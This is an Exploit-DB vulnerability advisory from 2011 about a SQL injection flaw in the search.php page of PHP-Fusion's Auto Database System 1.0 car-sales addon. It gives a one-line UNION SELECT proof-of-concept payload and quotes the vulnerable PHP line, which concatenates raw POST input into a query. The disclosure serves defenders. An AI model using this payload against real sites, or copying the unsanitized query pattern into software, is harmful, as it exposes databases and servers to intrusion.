Auto Database System 1.0 Infusion Addon - SQL Injection

EDB-ID:

16139

CVE:

N/A


Author:

Saif

Type:

webapps


Platform:

PHP

Date:

2011-02-09


# Exploit Title: PHP-Fusion Auto Database System 1.0 Infusion SQL injection
# Date: 8-2-2011
# Author: Saif El-Sherei
# Software Link:
http://www.php-fusion.co.uk/infusions/addondb/view.php?addon_id=146
# Version: Auto Database System 1.0 Infusion, PHP-fusion (7.01..03)
# Tested on: Firefox 3.0.15, , IE 8, mySQL v5
# Vendor Notified: vendor notified"8-2-2011", awaiting vendor response.


Info:

Auto Database System - for sales of cars.

Make new ads for cars - upload up to 5 pictures in each ad.

Info about:
- Car model/brand
- Type
- Fuel type
- Year
- Miles
- Price
- Doors
- Color
- Equipment

Print function on all pages.

Go-back-function on all pages.

Search-function for searching after brand/model.

Mouse-over the small pictures will change the big picture of the cars.

Side-panel incl. that showing the 10 Latest Incoming Cars.

SCREENSHOTS:
-------------------------
http://www.dev.dv...r_list.jpg
http://www.dev.dv...r_desc.jpg
http://www.dev.dv...ate_ad.jpg
http://www.dev.dv...in_ads.jpg

Details:

the search variable in "search.php" is not santized before the Db query,
allowing an attacker to alter the SQL query and gain remote access to the
server running the infusion.

POC:

' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#

Vulnerable Code:

$result = dbquery("SELECT * FROM ".DB_ADS." WHERE car_model like
'%".$_POST['SEARCHSTRING']."%'");
$rows = dbrows($result);